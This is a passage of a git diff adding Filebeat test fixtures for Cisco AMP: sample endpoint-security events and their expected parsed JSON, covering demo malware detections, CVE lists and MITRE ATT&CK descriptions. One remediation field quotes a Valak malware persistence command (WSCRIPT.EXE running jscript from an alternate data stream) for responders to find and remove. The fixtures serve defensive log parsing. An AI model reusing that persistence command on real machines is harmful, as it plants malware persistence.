Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1608872547,"start_date":"2020-12-25T05:02:27+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"mshtml.dll","identity":{"sha256":"d1bea74ac9d85b3dcd4abc1af42af6c37b9349defc8e6577993611b773f56ca0"},"parent":{"disposition":"Clean","identity":{"sha256":"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8"}}},"vulnerabilities":[{"name":"Microsoft Internet Explorer","version":"11","cve":"CVE-2018-0762","score":"7.6","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0762"},{"cve":"CVE-2018-0772","score":"7.6","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0772"}]}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":15193384371995,"timestamp":1608872546,"timestamp_nanoseconds":0,"date":"2020-12-25T05:02:26+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1608872546,"start_date":"2020-12-25T05:02:26+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"mshtml.dll","identity":{"sha256":"1dc5d15a26a79bb46519952a60b15aa4acb36f6ce3247ebf50df9c157bc4fcf4"},"parent":{"disposition":"Clean","identity":{"sha256":"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8"}}},"vulnerabilities":[{"name":"Microsoft Internet Explorer","version":"11","cve":"CVE-2018-0762","score":"7.6","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0762"},{"cve":"CVE-2018-0772","score":"7.6","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0772"}]}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":15193366641599,"timestamp":1608870773,"timestamp_nanoseconds":0,"date":"2020-12-25T04:32:53+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1608870773,"start_date":"2020-12-25T04:32:53+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"OUTLOOK.EXE","identity":{"sha256":"465f398ae8e3c32395eb7c04bc8cd24595068e6a127e243bed3e9b4931556bfc"},"parent":{"disposition":"Clean","identity":{"sha256":"71854d2c40664493e05c0a7e4f0c7cc74ada1a63eec1d4fe32350f6af8728243"}}},"vulnerabilities":[{"name":"Microsoft Office","version":"2016","cve":"CVE-2017-0106","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0106"},{"cve":"CVE-2017-11774","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11774"},{"cve":"CVE-2017-8506","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8506"},{"cve":"CVE-2017-8507","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8507"},{"cve":"CVE-2017-8571","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8571"},{"cve":"CVE-2017-8663","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8663"},{"cve":"CVE-2018-0791","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0791"}]}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525498672153625000,"timestamp":1608870165,"timestamp_nanoseconds":878000000,"date":"2020-12-25T04:22:45+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525494703603843000,"timestamp":1608869241,"timestamp_nanoseconds":928000000,"date":"2020-12-25T04:07:21+00:00","event_type":"Scan Completed, No Detections","event_type_id":554696715,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan","clean":true,"scanned_files":2872,"scanned_processes":49,"scanned_paths":0,"malicious_detections":0}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525494527510184000,"timestamp":1608869200,"timestamp_nanoseconds":537000000,"date":"2020-12-25T04:06:40+00:00","event_type":"Scan Started","event_type_id":554696714,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan"}}} diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp2.ndjson.log-expected.json b/x-pack/filebeat/module/cisco/amp/test/cisco_amp2.ndjson.log-expected.json new file mode 100644 index 000000000000..7cd87985c4a6 --- /dev/null +++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp2.ndjson.log-expected.json @@ -0,0 +1,6482 @@ +[ + { + "@timestamp": "2021-01-15T11:59:52.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "87:c2:d9:a2:8c:74" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296344, + "cisco.amp.related.mac": [ + "87:c2:d9:a2:8c:74" + ], + "cisco.amp.tactics": [ + { + "description": "

The adversary is trying to avoid being detected.

\n\n

Defense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. Other tactics\u2019 techniques are cross-listed here when those techniques include the added benefit of subverting defenses.

\n", + "external_id": "TA0005", + "mitre_name": "tactic", + "mitre_url": "https://attack.mitre.org/tactics/TA0005", + "name": "Defense Evasion" + } + ], + "cisco.amp.techniques": [ + { + "data_sources": "File monitoring, Process monitoring, Process command-line parameters", + "description": "

Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.

\n\n

Adversaries may do this using a Command and Scripting Interpreter, such as cmd, which has functionality to interact with the file system to gather information. Some adversaries may also use Automated Collection on the local system.

\n", + "external_id": "T1005", + "mitre_name": "technique", + "mitre_url": "https://attack.mitre.org/techniques/T1005", + "name": "Data from Local System", + "permissions": "", + "platforms": "Linux, macOS, Windows", + "system_requirements": "Privileges to access certain files and directories", + "tactics_names": "Collection" + }, + { + "data_sources": "File monitoring, Process monitoring, Process command-line parameters, Windows event logs", + "description": "

Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)

\n\n

Adversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges).

\n", + "external_id": "T1053", + "mitre_name": "technique", + "mitre_url": "https://attack.mitre.org/techniques/T1053", + "name": "Scheduled Task/Job", + "permissions": "Administrator, SYSTEM, User", + "platforms": "Windows, Linux, macOS", + "tactics_names": "Execution, Persistence, Privilege Escalation" + }, + { + "data_sources": "Process monitoring, File monitoring, Process command-line parameters", + "description": "

This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.

\n\n

Adversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and PowerShell but could also be in the form of command-line batch scripts.

\n\n

Scripts can be embedded inside Office documents as macros that can be set to execute when files used in Spearphishing Attachment and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through Exploitation for Client Execution, where adversaries will rely on macros being allowed or that the user will accept to activate them.

\n\n

Many popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit (Citation: Metasploit_Ref), Veil (Citation: Veil_Ref), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)

\n", + "external_id": "T1064", + "mitre_name": "technique", + "mitre_url": "https://attack.mitre.org/techniques/T1064", + "name": "Scripting", + "permissions": "User", + "platforms": "Linux, macOS, Windows", + "tactics_names": "Defense Evasion, Execution" + } + ], + "cisco.amp.threat_hunting.incident_end_time": "2020-06-18T11:12:50.000Z", + "cisco.amp.threat_hunting.incident_hunt_guid": "4bdbaf20-020f-4bb5-9da9-585da0e07817", + "cisco.amp.threat_hunting.incident_id": 416, + "cisco.amp.threat_hunting.incident_remediation": "We recommend the following:\r\n\r\n- Isolation of the affected hosts from the network\r\n- Perform forensic investigation\r\n - Review all activity performed by the user\r\n - Upload any suspicious files to ThreatGrid for analysis\r\n - Search the registry for data \"var config = ( COMMAND_C2\" and remove the key\r\n - Review scheduled tasks and cancel any involving the execution of WSCRIPT.EXE //E:jscript C:\\Users\\Public\\PowerManagerSpm.jar:LocalZone lqjsxokgowhbxjaetyrifnbigtcxmuj eimljujnv\r\n - Remove the Alternate Data Stream file located C:\\Users\\Public\\PowerManagerSpm.jar:LocalZone.\r\n- If possible, reimage the affected system to prevent potential unknown persistence methods.", + "cisco.amp.threat_hunting.incident_report_guid": "6e5292d5-248c-49dc-839d-201bcba64562", + "cisco.amp.threat_hunting.incident_start_time": "2021-01-15T10:48:08.000Z", + "cisco.amp.threat_hunting.incident_summary": "The host Demo_Threat_Hunting is compromised by a Valak malware variant. Valak is a multi-stage malware attack that uses screen capture, reconnaissance, geolocation, and fileless execution techniques to infiltrate and exfiltrate sensitive information. Based on the event details listed and the techniques used, we recommend the host in question be investigated further.", + "cisco.amp.threat_hunting.incident_title": "Valak Variant", + "cisco.amp.threat_hunting.severity": "critical", + "cisco.amp.threat_hunting.tactics": [ + { + "description": "

The adversary is trying to avoid being detected.

\n\n

Defense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. Other tactics\u2019 techniques are cross-listed here when those techniques include the added benefit of subverting defenses.

\n", + "external_id": "TA0005", + "mitre_name": "tactic", + "mitre_url": "https://attack.mitre.org/tactics/TA0005", + "name": "Defense Evasion" + } + ], + "cisco.amp.threat_hunting.techniques": [ + { + "data_sources": "File monitoring, Process monitoring, Process command-line parameters", + "description": "

Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.

\n\n

Adversaries may do this using a Command and Scripting Interpreter, such as cmd, which has functionality to interact with the file system to gather information. Some adversaries may also use Automated Collection on the local system.

\n", + "external_id": "T1005", + "mitre_name": "technique", + "mitre_url": "https://attack.mitre.org/techniques/T1005", + "name": "Data from Local System", + "permissions": "", + "platforms": "Linux, macOS, Windows", + "system_requirements": "Privileges to access certain files and directories", + "tactics_names": "Collection" + }, + { + "data_sources": "File monitoring, Process monitoring, Process command-line parameters, Windows event logs", + "description": "

Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)

\n\n

Adversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges).

\n", + "external_id": "T1053", + "mitre_name": "technique", + "mitre_url": "https://attack.mitre.org/techniques/T1053", + "name": "Scheduled Task/Job", + "permissions": "Administrator, SYSTEM, User", + "platforms": "Windows, Linux, macOS", + "tactics_names": "Execution, Persistence, Privilege Escalation" + }, + { + "data_sources": "Process monitoring, File monitoring, Process command-line parameters", + "description": "

This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.

\n\n

Adversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and PowerShell but could also be in the form of command-line batch scripts.

\n\n

Scripts can be embedded inside Office documents as macros that can be set to execute when files used in Spearphishing Attachment and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through Exploitation for Client Execution, where adversaries will rely on macros being allowed or that the user will accept to activate them.

\n\n

Many popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit (Citation: Metasploit_Ref), Veil (Citation: Veil_Ref), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)

\n", + "external_id": "T1064", + "mitre_name": "technique", + "mitre_url": "https://attack.mitre.org/techniques/T1064", + "name": "Scripting", + "permissions": "User", + "platforms": "Linux, macOS, Windows", + "tactics_names": "Defense Evasion, Execution" + } + ], + "cisco.amp.timestamp_nanoseconds": 155518026, + "event.action": "SecureX Threat Hunting Incident", + "event.dataset": "cisco.amp", + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 4, + "fileset.name": "amp", + "host.hostname": "Demo_Threat_Hunting", + "host.name": "Demo_Threat_Hunting", + "input.type": "log", + "log.offset": 0, + "related.hosts": [ + "Demo_Threat_Hunting" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T11:20:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "e1:e5:94:ea:a5:44" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.GenericKD:ZVETJ.18gs.1201", + "cisco.amp.detection_id": "6180352115244793858", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "e1:e5:94:ea:a5:44" + ], + "cisco.amp.timestamp_nanoseconds": 279000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6180352115244794000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e2f5dcd966e26d54329e8d79c7201652", + "file.hash.sha1": "70aef829bec17195e6c8ec0e6cba0ed39f97ba48", + "file.hash.sha256": "b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40", + "file.name": "wsymqyv90.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Local\\Temp\\OUTLOOK_TEMP\\wsymqyv90.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Upatre", + "host.name": "Demo_Upatre", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 12475, + "process.hash.md5": "b3581f426dc500a51091cdd5bacf0454", + "process.hash.sha1": "8de30174cebc8732f1ba961e7d93fe5549495a80", + "process.hash.sha256": "b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132", + "process.name": "iexplore.exe", + "process.pid": 4040, + "related.hash": [ + "b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40", + "e2f5dcd966e26d54329e8d79c7201652", + "70aef829bec17195e6c8ec0e6cba0ed39f97ba48" + ], + "related.hosts": [ + "Demo_Upatre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T11:20:06.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "e1:e5:94:ea:a5:44" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.GenericKD:ZVETJ.18gs.1201", + "cisco.amp.detection_id": "6180351977805840385", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "e1:e5:94:ea:a5:44" + ], + "cisco.amp.timestamp_nanoseconds": 548000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6180351977805840000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e2f5dcd966e26d54329e8d79c7201652", + "file.hash.sha1": "70aef829bec17195e6c8ec0e6cba0ed39f97ba48", + "file.hash.sha256": "b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40", + "file.name": "wsymqyv90.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Local\\Temp\\OUTLOOK_TEMP\\wsymqyv90.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Upatre", + "host.name": "Demo_Upatre", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 14116, + "process.hash.md5": "b3581f426dc500a51091cdd5bacf0454", + "process.hash.sha1": "8de30174cebc8732f1ba961e7d93fe5549495a80", + "process.hash.sha256": "b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132", + "process.name": "iexplore.exe", + "process.pid": 4040, + "related.hash": [ + "b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40", + "e2f5dcd966e26d54329e8d79c7201652", + "70aef829bec17195e6c8ec0e6cba0ed39f97ba48" + ], + "related.hosts": [ + "Demo_Upatre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:45:07.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.DFC.MalParent", + "cisco.amp.detection_id": "6159258594551267599", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 525000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159258594551267000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "iodnxvg.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\iodnxvg.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 15757, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:37:43.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "e1:e5:94:ea:a5:44" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "DFC.CustomIPList", + "cisco.amp.detection_id": "6180341055704006662", + "cisco.amp.event_type_id": 1090519084, + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.network_info.nfm.direction": "Outgoing connection from", + "cisco.amp.network_info.parent.disposition": "Clean", + "cisco.amp.related.mac": [ + "e1:e5:94:ea:a5:44" + ], + "cisco.amp.timestamp_nanoseconds": 978000000, + "destination.as.number": 15169, + "destination.as.organization.name": "Google LLC", + "destination.geo.continent_name": "North America", + "destination.geo.country_iso_code": "US", + "destination.geo.country_name": "United States", + "destination.geo.location.lat": 37.751, + "destination.geo.location.lon": -97.822, + "destination.ip": "8.8.4.4", + "destination.port": 443, + "event.action": "DFC Threat Detected", + "event.dataset": "cisco.amp", + "event.id": 6180341055704007000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "fileset.name": "amp", + "host.hostname": "Demo_Upatre", + "host.name": "Demo_Upatre", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 17081, + "network.direction": "egress", + "network.transport": "TCP", + "process.hash.md5": "b3581f426dc500a51091cdd5bacf0454", + "process.hash.sha1": "8de30174cebc8732f1ba961e7d93fe5549495a80", + "process.hash.sha256": "b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132", + "process.name": "iexplore.exe", + "process.pid": 3136, + "related.hosts": [ + "Demo_Upatre" + ], + "related.ip": [ + "10.10.0.0", + "8.8.4.4", + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "source.ip": "10.10.0.0", + "source.port": 55810, + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:32:58.000Z", + "cisco.amp.cloud_ioc.description": "A named pipe was created in a manner similar to that used for local privilege escalation through named pipe impersonation. Tools such as meterpreter often use this technique to escalate to NT Authority\\System.", + "cisco.amp.cloud_ioc.short_description": "W32.PossibleNamedPipeImpersonation.ioc", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "27:85:29:21:67:49" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296274, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "27:85:29:21:67:49" + ], + "cisco.amp.timestamp_nanoseconds": 322000000, + "event.action": "Cloud IOC", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 1476910664322001000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "event.start": "2021-01-15T10:32:58.000Z", + "file.hash.sha256": "935c1861df1f4018d698e8b65abfa02d7e9037d8f68ca3c2065b6ca165d44ad2", + "file.name": "cmd.exe", + "file.path": "/C:/WINDOWS/system32/cmd.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Command_Line_Arguments_Meterpreter", + "host.name": "Demo_Command_Line_Arguments_Meterpreter", + "input.type": "log", + "log.offset": 25799, + "process.hash.sha256": "69d6fff3e0a0c4d77a62b4d71e1e3a8d10d93c46782a1b05f0ec4b8919c384b9", + "related.hash": [ + "935c1861df1f4018d698e8b65abfa02d7e9037d8f68ca3c2065b6ca165d44ad2" + ], + "related.hosts": [ + "Demo_Command_Line_Arguments_Meterpreter" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:27:39.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533671385032556606", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 25000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533671385032557000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "\\\\?\\C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 27431, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + 